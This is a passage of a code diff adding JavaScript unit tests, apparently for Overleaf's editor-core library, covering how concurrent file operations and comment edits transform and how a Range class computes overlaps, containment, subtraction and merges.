}) + + it('transforms AddFile-RemoveFile that removes added file', function () { + runConcurrently( + Operation.removeFile('foo'), + addFile('foo', 'a'), + makeOneFileSnapshot() + ) + .expectFiles({ foo: 'a' }) + // if the move was committed first, the add overwrites it + .expectPrime(1, AddFileOperation) + // if the add was committed first, the move gets dropped + .expectPrime(0, NoOperation) + .expectSymmetry() + }) + + it('transforms AddFile-EditFile with no conflict', function () { + runConcurrently( + edit('foo', ['x']), + addFile('bar', 'a'), + makeOneFileSnapshot() + ) + .expectNoTransform() + .expectFiles({ bar: 'a', foo: 'x' }) + .expectSymmetry() + }) + + it('transforms AddFile-EditFile when new file is edited', function () { + runConcurrently( + edit('foo', ['x']), + addFile('foo', 'a'), + makeOneFileSnapshot() + ) + .expectFiles({ foo: 'a' }) + // if the edit was committed first, the add overwrites it + .expectPrime(1, AddFileOperation) + // if the add was committed first, the edit gets dropped + .expectPrime(0, NoOperation) + .expectSymmetry() + }) + + it('transforms AddFile-SetFileMetadata with no conflict', function () { + const testMetadata = { baz: 1 } + runConcurrently( + addFile('bar', 'a'), + Operation.setFileMetadata('foo', testMetadata), + makeOneFileSnapshot() + ) + .expectNoTransform() + .expectFiles({ + foo: { content: '', metadata: testMetadata, comments: [] }, + bar: 'a', + }) + .expectSymmetry() + }) + + it('transforms AddFile-SetFileMetadata with same name', function () { + const testMetadata = { baz: 1 } + runConcurrently( + addFile('foo', 'x'), + Operation.setFileMetadata('foo', testMetadata), + makeEmptySnapshot() + ) + .expectFiles({ + foo: { content: 'x', metadata: testMetadata, comments: [] }, + }) + .expectSymmetry() + }) + + it('transforms MoveFile-MoveFile with no conflict', function () { + runConcurrently( + Operation.moveFile('foo', 'baz'), + Operation.moveFile('bar', 'bat'), + makeTwoFileSnapshot() + ) + .expectFiles({ bat: 'a', baz: '' }) + .expectNoTransform() + .expectSymmetry() + }) + + it('transforms MoveFile-MoveFile same move foo->foo, foo->foo', function () { + runConcurrently( + Operation.moveFile('foo', 'foo'), + Operation.moveFile('foo', 'foo'), + makeOneFileSnapshot() + ) + .expectFiles({ foo: '' }) + .expectPrime(1, NoOperation) + .expectPrime(0, NoOperation) + .expectSymmetry() + }) + + it('transforms MoveFile-MoveFile no-op foo->foo, foo->bar', function () { + runConcurrently( + Operation.moveFile('foo', 'foo'), + Operation.moveFile('foo', 'bar'), + makeOneFileSnapshot() + ) + .expectFiles({ bar: '' }) + .expectPrime(1, MoveFileOperation) + .expectPrime(0, NoOperation) + .expectSymmetry() + }) + + it('transforms MoveFile-MoveFile no-op foo->foo, bar->foo', function () { + runConcurrently( + Operation.moveFile('foo', 'foo'), + Operation.moveFile('foo', 'bar'), + makeTwoFileSnapshot() + ) + .expectFiles({ bar: '' }) + .expectPrime(1, MoveFileOperation) + .expectPrime(0, NoOperation) + .expectSymmetry() + }) + + it('transforms MoveFile-MoveFile no-op foo->foo, bar->bar', function () { + runConcurrently( + Operation.moveFile('foo', 'foo'), + Operation.moveFile('bar', 'bar'), + makeTwoFileSnapshot() + ) + .expectFiles({ bar: 'a', foo: '' }) + .expectPrime(1, NoOperation) + .expectPrime(0, NoOperation) + .expectSymmetry() + }) + + it('transforms MoveFile-MoveFile same move foo->bar, foo->bar', function () { + runConcurrently( + Operation.moveFile('foo', 'bar'), + Operation.moveFile('foo', 'bar'), + makeOneFileSnapshot() + ) + .expectFiles({ bar: '' }) + .expectPrime(1, NoOperation) + .expectPrime(0, NoOperation) + .expectSymmetry() + }) + + it('transforms MoveFile-MoveFile opposite foo->bar, bar->foo', function () { + runConcurrently( + Operation.moveFile('foo', 'bar'), + Operation.moveFile('bar', 'foo'), + makeTwoFileSnapshot() + ) + .expectFiles([]) + .expectPrime(1, MoveFileOperation) + .expectPrime(0, MoveFileOperation) + .tap(function () { + expect(this.primeOperations[1].isRemoveFile()).to.be.true + expect(this.primeOperations[1].getPathname()).to.equal('bar') + + expect(this.primeOperations[0].isRemoveFile()).to.be.true + expect(this.primeOperations[0].getPathname()).to.equal('foo') + }) + .expectSymmetry() + }) + + it('transforms MoveFile-MoveFile no-op foo->foo, bar->baz', function () { + runConcurrently( + Operation.moveFile('foo', 'foo'), + Operation.moveFile('bar', 'baz'), + makeTwoFileSnapshot() + ) + .expectFiles({ baz: 'a', foo: '' }) + .expectPrime(1, MoveFileOperation) + .expectPrime(0, NoOperation) + .expectSymmetry() + }) + + it('transforms MoveFile-MoveFile diverge foo->bar, foo->baz', function () { + runConcurrently( + Operation.moveFile('foo', 'bar'), + Operation.moveFile('foo', 'baz'), + makeOneFileSnapshot() + ) + .expectFiles({ baz: '' }) + // if foo->bar was committed first, the second move becomes bar->baz + .expectPrime(1, MoveFileOperation) + // if foo->baz was committed first, the second move becomes a no-op + .expectPrime(0, NoOperation) + .tap(function () { + expect(this.primeOperations[1].getPathname()).to.equal('bar') + expect(this.primeOperations[1].getNewPathname()).to.equal('baz') + }) + .swap() + .expectFiles({ bar: '' }) + }) + + it('transforms MoveFile-MoveFile transitive foo->baz, bar->foo', function () { + runConcurrently( + Operation.moveFile('foo', 'baz'), + Operation.moveFile('bar', 'foo'), + makeTwoFileSnapshot() + ) + .expectFiles({ baz: 'a' }) + .expectPrime(1, MoveFileOperation) + .expectPrime(0, MoveFileOperation) + .expectSymmetry() + }) + + it('transforms MoveFile-MoveFile transitive foo->bar, bar->baz', function () { + runConcurrently( + Operation.moveFile('foo', 'bar'), + Operation.moveFile('bar', 'baz'), + makeTwoFileSnapshot() + ) + .expectFiles({ baz: '' }) + .expectPrime(1, MoveFileOperation) + .expectPrime(0, MoveFileOperation) + .expectSymmetry() + }) + + it('transforms MoveFile-MoveFile converge foo->baz, bar->baz', function () { + runConcurrently( + Operation.moveFile('foo', 'baz'), + Operation.moveFile('bar', 'baz'), + makeTwoFileSnapshot() + ) + .expectFiles({ baz: 'a' }) + .expectPrime(1, MoveFileOperation) + .expectPrime(0, MoveFileOperation) + .tap(function () { + // if foo->baz was committed first, we just apply the move + expect(this.primeOperations[1]).to.eql(this.operations[1]) + + // if bar->baz was committed first, the other move becomes a remove + expect(this.primeOperations[0].isRemoveFile()).to.be.true + expect(this.primeOperations[0].getPathname()).to.equal('foo') + }) + .swap() + .expectFiles({ baz: '' }) + }) + + it('transforms MoveFile-RemoveFile no-op foo->foo, foo->', function () { + runConcurrently( + Operation.moveFile('foo', 'foo'), + Operation.removeFile('foo'), + makeOneFileSnapshot() + ) + .expectFiles([]) + .expectPrime(1, MoveFileOperation) + .expectPrime(0, NoOperation) + .tap(function () { + expect(this.primeOperations[1].isRemoveFile()).to.be.true + }) + .expectSymmetry() + }) + + it('transforms MoveFile-RemoveFile same move foo->, foo->', function () { + runConcurrently( + Operation.removeFile('foo'), + Operation.removeFile('foo'), + makeOneFileSnapshot() + ) + .expectFiles([]) + .expectPrime(1, NoOperation) + .expectPrime(0, NoOperation) + .expectSymmetry() + }) + + it('transforms MoveFile-RemoveFile no conflict foo->, bar->', function () { + runConcurrently( + Operation.removeFile('foo'), + Operation.removeFile('bar'), + makeTwoFileSnapshot() + ) + .expectFiles([]) + .expectNoTransform() + .expectSymmetry() + }) + + it('transforms MoveFile-RemoveFile no conflict foo->foo, bar->', function () { + runConcurrently( + Operation.moveFile('foo', 'foo'), + Operation.removeFile('bar'), + makeTwoFileSnapshot() + ) + .expectFiles({ foo: '' }) + .expectPrime(1, MoveFileOperation) + .expectPrime(0, NoOperation) + .tap(function () { + expect(this.primeOperations[1].isRemoveFile()).to.be.true + }) + .expectSymmetry() + }) + + it('transforms MoveFile-RemoveFile transitive foo->, bar->foo', function () { + runConcurrently( + Operation.removeFile('foo'), + Operation.moveFile('bar', 'foo'), + makeTwoFileSnapshot() + ) + .expectFiles([]) + .expectPrime(1, MoveFileOperation) + .expectPrime(0, MoveFileOperation) + .tap(function () { + expect(this.primeOperations[1].isRemoveFile()).to.be.true + expect(this.primeOperations[1].getPathname()).to.equal('bar') + + expect(this.primeOperations[0].isRemoveFile()).to.be.true + expect(this.primeOperations[0].getPathname()).to.equal('foo') + }) + .expectSymmetry() + }) + + it('transforms MoveFile-RemoveFile transitive foo->bar, bar->', function () { + runConcurrently( + Operation.moveFile('foo', 'bar'), + Operation.removeFile('bar'), + makeTwoFileSnapshot() + ) + .expectFiles({}) + .expectPrime(1, MoveFileOperation) + .expectPrime(0, MoveFileOperation) + .tap(function () { + expect(this.primeOperations[1].isRemoveFile()).to.be.true + expect(this.primeOperations[1].getPathname()).to.equal('bar') + + expect(this.primeOperations[0].isRemoveFile()).to.be.true + expect(this.primeOperations[0].getPathname()).to.equal('foo') + }) + .expectSymmetry() + }) + + it('transforms MoveFile-EditFile with no conflict', function () { + runConcurrently( + Operation.moveFile('bar', 'baz'), + edit('foo', ['x']), + makeTwoFileSnapshot() + ) + .expectFiles({ baz: 'a', foo: 'x' }) + .expectNoTransform() + .expectSymmetry() + }) + + it('transforms MoveFile-EditFile with edit on pathname', function () { + runConcurrently( + Operation.moveFile('foo', 'bar'), + edit('foo', ['x']), + makeOneFileSnapshot() + ) + .expectFiles({ bar: 'x' }) + .expectPrime(1, EditFileOperation) + .expectPrime(0, MoveFileOperation) + .tap(function () { + expect(this.primeOperations[1].getPathname()).to.equal('bar') + + expect(this.primeOperations[0].getPathname()).to.equal('foo') + expect(this.primeOperations[0].getNewPathname()).to.equal('bar') + }) + .expectSymmetry() + }) + + it('transforms MoveFile-EditFile with edit on new pathname', function () { + runConcurrently( + Operation.moveFile('bar', 'foo'), + edit('foo', ['x']), + makeTwoFileSnapshot() + ) + .expectFiles({ foo: 'a' }) + .expectPrime(1, NoOperation) + .tap(function () { + expect(this.primeOperations[0]).to.eql(this.operations[0]) + }) + .expectSymmetry() + }) + + it('transforms MoveFile-EditFile with no-op move', function () { + runConcurrently( + Operation.moveFile('foo', 'foo'), + edit('foo', ['x']), + makeOneFileSnapshot() + ) + .expectFiles({ foo: 'x' }) + .expectNoTransform() + .expectSymmetry() + }) + + it('transforms MoveFile-SetFileMetadata with no conflict', function () { + const testMetadata = { baz: 1 } + runConcurrently( + Operation.moveFile('foo', 'baz'), + Operation.setFileMetadata('bar', testMetadata), + makeTwoFileSnapshot() + ) + .expectNoTransform() + .expectFiles({ + bar: { content: 'a', metadata: testMetadata, comments: [] }, + baz: '', + }) + .expectSymmetry() + }) + + it('transforms MoveFile-SetFileMetadata with set on pathname', function () { + const testMetadata = { baz: 1 } + runConcurrently( + Operation.moveFile('foo', 'bar'), + Operation.setFileMetadata('foo', testMetadata), + makeOneFileSnapshot() + ) + .expectFiles({ + bar: { content: '', metadata: testMetadata, comments: [] }, + }) + .expectSymmetry() + }) + + it('transforms MoveFile-SetFileMetadata w/ set on new pathname', function () { + const testMetadata = { baz: 1 } + runConcurrently( + Operation.moveFile('foo', 'bar'), + Operation.setFileMetadata('bar', testMetadata), + makeTwoFileSnapshot() + ) + // move wins + .expectFiles({ bar: { content: '', metadata: {}, comments: [] } }) + .expectSymmetry() + }) + + it('transforms MoveFile-SetFileMetadata with no-op move', function () { + const testMetadata = { baz: 1 } + runConcurrently( + Operation.moveFile('foo', 'foo'), + Operation.setFileMetadata('foo', testMetadata), + makeOneFileSnapshot() + ) + .expectFiles({ + foo: { content: '', metadata: testMetadata, comments: [] }, + }) + .expectSymmetry() + }) + + it('transforms EditFile-EditFile with no conflict', function () { + runConcurrently( + edit('foo', ['x']), + edit('bar', [1, 'x']), + makeTwoFileSnapshot() + ) + .expectFiles({ bar: 'ax', foo: 'x' }) + .expectNoTransform() + .expectSymmetry() + }) + + it('transforms EditFile-EditFile on same file', function () { + runConcurrently( + edit('foo', ['x']), + edit('foo', ['y']), + makeOneFileSnapshot() + ) + .expectFiles({ foo: 'xy' }) + .expectPrime(1, EditFileOperation) + .expectPrime(0, EditFileOperation) + .tap(function () { + expect(this.primeOperations[1].getOperation().toJSON()).to.eql({ + textOperation: [1, 'y'], + }) + expect(this.primeOperations[0].getOperation().toJSON()).to.eql({ + textOperation: ['x', 1], + }) + }) + .swap() + .expectFiles({ foo: 'yx' }) + }) + + it('transforms EditFile-RemoveFile with no conflict', function () { + runConcurrently( + edit('foo', ['x']), + Operation.removeFile('bar'), + makeTwoFileSnapshot() + ) + .expectFiles({ foo: 'x' }) + .expectNoTransform() + .expectSymmetry() + }) + + it('transforms EditFile-RemoveFile on same file', function () { + runConcurrently( + edit('foo', ['x']), + Operation.removeFile('foo'), + makeOneFileSnapshot() + ) + .expectFiles({}) + .expectSymmetry() + }) + + it('transforms EditFile-SetFileMetadata with no conflict', function () { + const testMetadata = { baz: 1 } + runConcurrently( + edit('foo', ['x']), + Operation.setFileMetadata('bar', testMetadata), + makeTwoFileSnapshot() + ) + .expectNoTransform() + .expectFiles({ + foo: { content: 'x', metadata: {}, comments: [] }, + bar: { content: 'a', metadata: testMetadata, comments: [] }, + }) + .expectSymmetry() + }) + + it('transforms EditFile-SetFileMetadata on same file', function () { + const testMetadata = { baz: 1 } + runConcurrently( + edit('foo', ['x']), + Operation.setFileMetadata('foo', testMetadata), + makeOneFileSnapshot() + ) + .expectNoTransform() + .expectFiles({ + foo: { content: 'x', metadata: testMetadata, comments: [] }, + }) + .expectSymmetry() + }) + + it('transforms SetFileMetadata-SetFileMetadata w/ no conflict', function () { + runConcurrently( + Operation.setFileMetadata('foo', { baz: 1 }), + Operation.setFileMetadata('bar', { baz: 2 }), + makeTwoFileSnapshot() + ) + .expectNoTransform() + .expectFiles({ + foo: { content: '', metadata: { baz: 1 }, comments: [] }, + bar: { content: 'a', metadata: { baz: 2 }, comments: [] }, + }) + .expectSymmetry() + }) + + it('transforms SetFileMetadata-SetFileMetadata on same file', function () { + runConcurrently( + Operation.setFileMetadata('foo', { baz: 1 }), + Operation.setFileMetadata('foo', { baz: 2 }), + makeOneFileSnapshot() + ) + // second op wins + .expectFiles({ foo: { content: '', metadata: { baz: 2 }, comments: [] } }) + .swap() + // first op wins + .expectFiles({ foo: { content: '', metadata: { baz: 1 }, comments: [] } }) + }) + + it('transforms SetFileMetadata-RemoveFile with no conflict', function () { + const testMetadata = { baz: 1 } + runConcurrently( + Operation.setFileMetadata('foo', testMetadata), + Operation.removeFile('bar'), + makeTwoFileSnapshot() + ) + .expectNoTransform() + .expectFiles({ + foo: { content: '', metadata: testMetadata, comments: [] }, + }) + .expectSymmetry() + }) + + it('transforms SetFileMetadata-RemoveFile on same file', function () { + const testMetadata = { baz: 1 } + runConcurrently( + Operation.setFileMetadata('foo', testMetadata), + Operation.removeFile('foo'), + makeOneFileSnapshot() + ) + .expectFiles({}) + .expectSymmetry() + }) + + it('transforms no-op with other operation', function () { + runConcurrently(Operation.NO_OP, addFile('foo', 'test')).expectFiles({ + foo: 'test', + }) + }) + + describe('EditFile sub operations', function () { + it('transforms AddCommentOperation-AddCommentOperation', function () { + runConcurrently( + Operation.editFile( + 'foo', + AddCommentOperation.fromJSON({ + commentId: '1', + ranges: [ + { + pos: 10, + length: 2, + }, + ], + }) + ), + Operation.editFile( + 'foo', + AddCommentOperation.fromJSON({ + commentId: '1', + ranges: [ + { + pos: 0, + length: 1, + }, + ], + }) + ), + makeOneFileSnapshot() + ) + .expectTransform() + .expectFiles({ + foo: { + content: '', + metadata: {}, + comments: [ + { + id: '1', + ranges: [ + { + pos: 0, + length: 1, + }, + ], + }, + ], + }, + }) + }) + + it('transforms TextOperation-AddCommentOperation', function () { + runConcurrently( + Operation.editFile( + 'foo', + TextOperation.fromJSON({ textOperation: ['xyz'] }) + ), + Operation.editFile( + 'foo', + AddCommentOperation.fromJSON({ + commentId: '1', + ranges: [ + { + pos: 0, + length: 1, + }, + ], + }) + ), + makeOneFileSnapshot() + ) + .expectTransform() + .expectFiles({ + foo: { + content: 'xyz', + metadata: {}, + comments: [{ id: '1', ranges: [{ pos: 3, length: 1 }] }], + }, + }) + .expectSymmetry() + }) + + it('transforms TextOperation-AddCommentOperation (insert with commentId)', function () { + runConcurrently( + Operation.editFile( + 'foo', + TextOperation.fromJSON({ + textOperation: [{ i: 'xyz', commentIds: ['1'] }], + }) + ), + Operation.editFile( + 'foo', + AddCommentOperation.fromJSON({ + commentId: '1', + ranges: [ + { + pos: 0, + length: 1, + }, + ], + }) + ), + makeOneFileSnapshot() + ) + .expectTransform() + .expectFiles({ + foo: { + content: 'xyz', + metadata: {}, + comments: [{ id: '1', ranges: [{ pos: 0, length: 4 }] }], + }, + }) + .expectSymmetry() + }) + + it('transforms AddCommentOperation-SetCommentStateOperation', function () { + runConcurrently( + Operation.editFile( + 'foo', + AddCommentOperation.fromJSON({ + commentId: '1', + ranges: [{ pos: 1, length: 2 }], + }) + ), + Operation.editFile( + 'foo', + SetCommentStateOperation.fromJSON({ + commentId: '1', + resolved: true, + }) + ), + makeOneFileSnapshot() + ) + .expectTransform() + .expectFiles({ + foo: { + content: '', + metadata: {}, + comments: [ + { id: '1', ranges: [{ pos: 1, length: 2 }], resolved: true }, + ], + }, + }) + .expectSymmetry() + }) + + it('transforms AddCommentOperation-DeleteCommentOperation ', function () { + runConcurrently( + Operation.editFile( + 'foo', + AddCommentOperation.fromJSON({ + commentId: '1', + ranges: [{ pos: 1, length: 2 }], + }) + ), + Operation.editFile( + 'foo', + DeleteCommentOperation.fromJSON({ deleteComment: '1' }) + ), + makeOneFileSnapshot() + ) + .expectTransform() + .expectFiles({ + foo: { + content: '', + metadata: {}, + comments: [], + }, + }) + .expectSymmetry() + }) + + it('transforms DeleteCommentOperation-SetCommentStateOperation ', function () { + runConcurrently( + Operation.editFile( + 'foo', + DeleteCommentOperation.fromJSON({ deleteComment: '1' }) + ), + Operation.editFile( + 'foo', + SetCommentStateOperation.fromJSON({ + commentId: '1', + resolved: true, + }) + ), + makeOneFileSnapshot() + ) + .expectTransform() + .expectFiles({ + foo: { + content: '', + metadata: {}, + comments: [], + }, + }) + .expectSymmetry() + }) + + it('transforms DeleteCommentOperation-DeleteCommentOperation ', function () { + runConcurrently( + Operation.editFile( + 'foo', + DeleteCommentOperation.fromJSON({ deleteComment: '1' }) + ), + Operation.editFile( + 'foo', + DeleteCommentOperation.fromJSON({ deleteComment: '1' }) + ), + makeOneFileSnapshot() + ) + .expectTransform() + .expectFiles({ + foo: { + content: '', + metadata: {}, + comments: [], + }, + }) + .expectSymmetry() + }) + + it('transforms SetCommentStateOperation-SetCommentStateOperation to resolved comment', function () { + const snapshot = makeEmptySnapshot() + const file = new File( + new StringFileData('xyz', [ + { id: '1', ranges: [{ pos: 0, length: 3 }] }, + ]) + ) + snapshot.addFile('foo', file) + + runConcurrently( + Operation.editFile( + 'foo', + SetCommentStateOperation.fromJSON({ + commentId: '1', + resolved: true, + }) + ), + Operation.editFile( + 'foo', + SetCommentStateOperation.fromJSON({ + commentId: '1', + resolved: true, + }) + ), + snapshot + ) + .expectTransform() + .expectFiles({ + foo: { + content: 'xyz', + metadata: {}, + comments: [ + { id: '1', ranges: [{ pos: 0, length: 3 }], resolved: true }, + ], + }, + }) + .expectSymmetry() + }) + + it('transforms SetCommentStateOperation-SetCommentStateOperation to unresolved comment', function () { + const snapshot = makeEmptySnapshot() + const file = new File( + new StringFileData('xyz', [ + { id: '1', ranges: [{ pos: 0, length: 3 }] }, + ]) + ) + snapshot.addFile('foo', file) + + runConcurrently( + Operation.editFile( + 'foo', + SetCommentStateOperation.fromJSON({ + commentId: '1', + resolved: true, + }) + ), + Operation.editFile( + 'foo', + SetCommentStateOperation.fromJSON({ + commentId: '1', + resolved: false, + }) + ), + snapshot + ) + .expectTransform() + .expectFiles({ + foo: { + content: 'xyz', + metadata: {}, + comments: [{ id: '1', ranges: [{ pos: 0, length: 3 }] }], + }, + }) + .expectSymmetry() + }) + }) +}) diff --git a/libraries/overleaf-editor-core/test/range.test.js b/libraries/overleaf-editor-core/test/range.test.js new file mode 100644 index 0000000..daad8fd --- /dev/null +++ b/libraries/overleaf-editor-core/test/range.test.js @@ -0,0 +1,452 @@ +// @ts-check +'use strict' + +const { expect } = require('chai') +const Range = require('../lib/range') + +describe('Range', function () { + it('should create a range', function () { + const from5to14 = new Range(5, 10) + expect(from5to14.start).to.eql(5) + expect(from5to14.end).to.eql(15) + }) + + it('should create a range using fromRaw', function () { + const from5to14 = Range.fromRaw({ pos: 5, length: 10 }) + expect(from5to14.start).to.eql(5) + expect(from5to14.end).to.eql(15) + }) + + it('should convert to raw', function () { + const from5to14 = new Range(5, 10) + expect(from5to14.toRaw()).to.eql({ pos: 5, length: 10 }) + }) + + it('should check isEmpty method', function () { + const from5to14 = new Range(5, 10) + expect(from5to14.isEmpty()).to.be.false + + const range0length = new Range(5, 0) + expect(range0length.isEmpty()).to.be.true + }) + + it('should not create a range with a negative position', function () { + expect(() => new Range(-1, 10)).to.throw + }) + + it('should not create a range with a negative length', function () { + expect(() => new Range(0, -2)).to.throw + }) + + describe('overlaps', function () { + it('same ranges should overlap', function () { + const range1 = new Range(1, 3) + const range2 = new Range(1, 3) + expect(range1.overlaps(range2)).to.eql(true) + }) + + it('non-touching ranges should not overlap', function () { + const from1to3 = new Range(1, 3) + const from10to12 = new Range(10, 3) + expect(from1to3.overlaps(from10to12)).to.eql(false) + expect(from10to12.overlaps(from1to3)).to.eql(false) + }) + + it('touching ranges should not overlap', function () { + const from1to3 = new Range(1, 3) + const from4to6 = new Range(4, 3) + expect(from1to3.overlaps(from4to6)).to.eql(false) + expect(from4to6.overlaps(from1to3)).to.eql(false) + }) + + it('should overlap', function () { + const from1to3 = new Range(1, 3) + const from2to4 = new Range(2, 3) + expect(from1to3.overlaps(from2to4)).to.eql(true) + expect(from2to4.overlaps(from1to3)).to.eql(true) + }) + }) + + describe('touches', function () { + it('should not touch if ranges are the same', function () { + const range1 = new Range(1, 3) + const range2 = new Range(1, 3) + expect(range1.touches(range2)).to.eql(false) + expect(range2.touches(range1)).to.eql(false) + }) + + it('should return true when ranges touch at one point', function () { + const from1to3 = new Range(1, 3) + const from4to5 = new Range(4, 2) + expect(from1to3.touches(from4to5)).to.eql(true) + expect(from4to5.touches(from1to3)).to.eql(true) + }) + + it('should return false when ranges do not touch', function () { + const from1to3 = new Range(1, 3) + const from5to6 = new Range(5, 2) + expect(from1to3.touches(from5to6)).to.eql(false) + expect(from5to6.touches(from1to3)).to.eql(false) + }) + + it('should return false when ranges overlap', function () { + const from1to3 = new Range(1, 3) + const from3to4 = new Range(3, 2) + expect(from1to3.touches(from3to4)).to.eql(false) + expect(from3to4.touches(from1to3)).to.eql(false) + }) + }) + + it('should check if range contains another', function () { + const from0to2 = new Range(0, 3) + const from4to13 = new Range(4, 10) + const from4to14 = new Range(4, 11) + const from4to15 = new Range(4, 12) + const from5to13 = new Range(5, 9) + const from5to14 = new Range(5, 10) + const from5to15 = new Range(5, 11) + const from0to99 = new Range(0, 100) + + expect(from0to2.contains(from0to2)).to.eql(true) + expect(from0to2.contains(from4to13)).to.eql(false) + expect(from0to2.contains(from4to14)).to.eql(false) + expect(from0to2.contains(from4to15)).to.eql(false) + expect(from0to2.contains(from5to13)).to.eql(false) + expect(from0to2.contains(from5to14)).to.eql(false) + expect(from0to2.contains(from5to15)).to.eql(false) + expect(from0to2.contains(from0to99)).to.eql(false) + + expect(from4to13.contains(from0to2)).to.eql(false) + expect(from4to13.contains(from4to13)).to.eql(true) + expect(from4to13.contains(from4to14)).to.eql(false) + expect(from4to13.contains(from4to15)).to.eql(false) + expect(from4to13.contains(from5to13)).to.eql(true) + expect(from4to13.contains(from5to14)).to.eql(false) + expect(from4to13.contains(from5to15)).to.eql(false) + expect(from4to13.contains(from0to99)).to.eql(false) + + expect(from4to14.contains(from0to2)).to.eql(false) + expect(from4to14.contains(from4to13)).to.eql(true) + expect(from4to14.contains(from4to14)).to.eql(true) + expect(from4to14.contains(from4to15)).to.eql(false) + expect(from4to14.contains(from5to13)).to.eql(true) + expect(from4to14.contains(from5to14)).to.eql(true) + expect(from4to14.contains(from5to15)).to.eql(false) + expect(from4to14.contains(from0to99)).to.eql(false) + + expect(from4to15.contains(from0to2)).to.eql(false) + expect(from4to15.contains(from4to13)).to.eql(true) + expect(from4to15.contains(from4to14)).to.eql(true) + expect(from4to15.contains(from4to15)).to.eql(true) + expect(from4to15.contains(from5to13)).to.eql(true) + expect(from4to15.contains(from5to14)).to.eql(true) + expect(from4to15.contains(from5to15)).to.eql(true) + expect(from4to15.contains(from0to99)).to.eql(false) + + expect(from5to13.contains(from0to2)).to.eql(false) + expect(from5to13.contains(from4to13)).to.eql(false) + expect(from5to13.contains(from4to14)).to.eql(false) + expect(from5to13.contains(from4to15)).to.eql(false) + expect(from5to13.contains(from5to13)).to.eql(true) + expect(from5to13.contains(from5to14)).to.eql(false) + expect(from5to13.contains(from5to15)).to.eql(false) + expect(from5to13.contains(from0to99)).to.eql(false) + + expect(from5to14.contains(from0to2)).to.eql(false) + expect(from5to14.contains(from4to13)).to.eql(false) + expect(from5to14.contains(from4to14)).to.eql(false) + expect(from5to14.contains(from4to15)).to.eql(false) + expect(from5to14.contains(from5to13)).to.eql(true) + expect(from5to14.contains(from5to14)).to.eql(true) + expect(from5to14.contains(from5to15)).to.eql(false) + expect(from5to14.contains(from0to99)).to.eql(false) + + expect(from5to15.contains(from0to2)).to.eql(false) + expect(from5to15.contains(from4to13)).to.eql(false) + expect(from5to15.contains(from4to14)).to.eql(false) + expect(from5to15.contains(from4to15)).to.eql(false) + expect(from5to15.contains(from5to13)).to.eql(true) + expect(from5to15.contains(from5to14)).to.eql(true) + expect(from5to15.contains(from5to15)).to.eql(true) + expect(from5to15.contains(from0to99)).to.eql(false) + + expect(from0to99.contains(from0to2)).to.eql(true) + expect(from0to99.contains(from4to13)).to.eql(true) + expect(from0to99.contains(from4to14)).to.eql(true) + expect(from0to99.contains(from4to15)).to.eql(true) + expect(from0to99.contains(from5to13)).to.eql(true) + expect(from0to99.contains(from5to14)).to.eql(true) + expect(from0to99.contains(from5to15)).to.eql(true) + expect(from0to99.contains(from0to99)).to.eql(true) + }) + + it('should check if range contains a cursor', function () { + const from5to14 = new Range(5, 10) + expect(from5to14.containsCursor(4)).to.eql(false) + expect(from5to14.containsCursor(5)).to.eql(true) + expect(from5to14.containsCursor(6)).to.eql(true) + expect(from5to14.containsCursor(14)).to.eql(true) + expect(from5to14.containsCursor(15)).to.eql(true) + expect(from5to14.containsCursor(16)).to.eql(false) + }) + + describe('subtract range from another', function () { + it('should not subtract', function () { + const from1to5 = new Range(1, 6) + const from0to1 = new Range(0, 1) + const subtracted = from1to5.subtract(from0to1) + expect(subtracted.start).to.eql(1) + expect(subtracted.length).to.eql(6) + }) + + it('should subtract from the left', function () { + const from5to19 = new Range(5, 15) + const from15to24 = new Range(15, 10) + const subtracted = from15to24.subtract(from5to19) + expect(subtracted.start).to.eql(5) + expect(subtracted.end).to.eql(10) + }) + + it('should subtract from the right', function () { + const from10to24 = new Range(10, 15) + const from5to19 = new Range(5, 15) + const subtracted = from5to19.subtract(from10to24) + expect(subtracted.start).to.eql(5) + expect(subtracted.end).to.eql(10) + }) + + it('should subtract from the middle', function () { + const from5to19 = new Range(5, 15) + const from10to14 = new Range(10, 5) + const subtracted = from5to19.subtract(from10to14) + expect(subtracted.start).to.eql(5) + expect(subtracted.end).to.eql(15) + }) + + it('should delete entire range', function () { + const from0to99 = new Range(0, 100) + const from5to19 = new Range(5, 15) + const subtracted = from5to19.subtract(from0to99) + expect(subtracted.start).to.eql(5) + expect(subtracted.end).to.eql(5) + expect(subtracted.length).to.eql(0) + }) + + it('should not subtract if ranges do not overlap', function () { + const from5to14 = new Range(5, 10) + const from20to29 = new Range(20, 10) + const subtracted1 = from5to14.subtract(from20to29) + const subtracted2 = from20to29.subtract(from5to14) + expect(subtracted1.toRaw()).deep.equal(from5to14.toRaw()) + expect(subtracted2.toRaw()).deep.equal(from20to29.toRaw()) + }) + }) + + describe('merge ranges', function () { + it('should merge ranges overlaping at the end', function () { + const from5to14 = new Range(5, 10) + const from10to19 = new Range(10, 10) + expect(from5to14.canMerge(from10to19)).to.eql(true) + const result = from5to14.merge(from10to19) + expect(result.start).to.eql(5) + expect(result.end).to.eql(20) + }) + + it('should merge ranges overlaping at the start', function () { + const from5to14 = new Range(5, 10) + const from0to9 = new Range(0, 10) + expect(from5to14.canMerge(from0to9)).to.eql(true) + const result = from5to14.merge(from0to9) + expect(result.start).to.eql(0) + expect(result.end).to.eql(15) + }) + + it('should merge ranges if one is covered by another', function () { + const from5to14 = new Range(5, 10) + const from0to19 = new Range(0, 20) + expect(from5to14.canMerge(from0to19)).to.eql(true) + const result = from5to14.merge(from0to19) + expect(result.toRaw()).deep.equal(from0to19.toRaw()) + }) + + it('should produce the same length after merge', function () { + const from5to14 = new Range(5, 10) + const from0to19 = new Range(0, 20) + expect(from0to19.canMerge(from5to14)).to.eql(true) + const result = from0to19.merge(from5to14) + expect(result.start).to.eql(0) + expect(result.end).to.eql(20) + }) + + it('should not merge ranges if they do not overlap', function () { + const from5to14 = new Range(5, 10) + const from20to29 = new Range(20, 10) + expect(from5to14.canMerge(from20to29)).to.eql(false) + expect(from20to29.canMerge(from5to14)).to.eql(false) + expect(() => from5to14.merge(from20to29)).to.throw() + }) + }) + + it('should check if range starts after a range', function () { + const from0to4 = new Range(0, 5) + const from1to5 = new Range(1, 5) + const from5to9 = new Range(5, 5) + const from6to10 = new Range(6, 5) + const from10to14 = new Range(10, 5) + + expect(from0to4.startsAfter(from0to4)).to.eql(false) + expect(from0to4.startsAfter(from1to5)).to.eql(false) + expect(from0to4.startsAfter(from5to9)).to.eql(false) + expect(from0to4.startsAfter(from6to10)).to.eql(false) + expect(from0to4.startsAfter(from10to14)).to.eql(false) + + expect(from1to5.startsAfter(from0to4)).to.eql(false) + expect(from1to5.startsAfter(from1to5)).to.eql(false) + 